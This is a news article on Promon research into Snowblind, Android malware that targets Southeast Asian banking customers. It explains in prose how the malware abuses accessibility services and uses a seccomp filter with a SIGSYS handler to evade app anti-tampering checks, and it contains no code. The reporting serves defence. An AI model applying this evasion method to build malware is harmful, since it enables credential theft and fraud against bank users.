A novel malware strain is being used to target banking customers in Southeast Asia, leading to financial losses and fraud, according to Promon research.
The newly discovered malware, dubbed Snowblind, uses a powerful and “never-before-seen” technique to disable Android banking apps’ ability to determine if they have been maliciously modified, thereby avoiding detection.
Snowblind is designed to exploit accessibility services on apps, which are features in the Android operating system designed to assist users with disabilities use their devices more effectively.
These services have extensive permissions to interact with and modify app interfaces, allowing them to read the contents of the screen, input text and perform actions on behalf of the user.
Snowblind is exploiting these services to access sensitive information, navigate the device or control apps and bypass security measures by automating interactions that would typically require user intervention, according to Promon.
This approach enables threat actors to perform a number of malicious activities. These include:
- Stealing users’ login credentials
- Hijacking a user’s banking session to make unauthorized transactions
- Disable app security features, such as two-factor authentication (2FA) or biometric verification
- Exfiltrate sensitive personally identifiable information (PII) and transaction data
The malware is effective on all modern Android devices and has been observed specifically targeting banking apps.
How Snowblind Malware Avoids Detection
Snowblind avoids detection by modifying the app to prevent it from detecting the existence of accessibility services.
To do so, it exploits the Linux kernel feature ‘seccomp,’ which controls what an app is allowed to do by limiting the system calls or requests an application can make from the operating system.
The malware is able to bypass anti-tampering code in seccomp by installing its own seccomp filter in the process it gets loaded into.
It can then instruct the kernel to stop system calls, causing a SIGSYS signal to be generated.
Snowblind additionally installs a signal handler for SIGSYS, allowing it to intercept and modify these calls to prevent detection.
The malware also prevents too many signals being generated and noticeably slowing down the app, it does this by having the filter check where the call to the system call came from.
The filter will only instruct the kernel to generate the signal if the call came from the library that implements the anti-tampering mechanism.
Promon stated that this attack is particularly powerful, as it goes beyond bypassing anti-tampering mechanisms on an app to manipulate and trace any code that relies on system calls, even if it implements the system calls. This prevents such mechanisms’ ability to scan the integrity of the code and detect any tampered files.
A Novel Malware Strain
The researchers noted that Snowblind is more sophisticated than other well-known techniques used to bypass anti-tampering code, which developers can largely mitigate by using obfuscation and strong integrity checking of their code in memory.
The approach used in Snowblind has not been publicly described in use in any public tools. While the researchers have observed a few repositories in GitHub implementing “something in this direction” and some Chinese blog posts describing similar methods, none appear to be as refined as the methods Snowblind uses.
They noted that all these sources seem to be in Chinese.
Promon has urged apps to protect against this technique before it is utilized more widely by threat actors.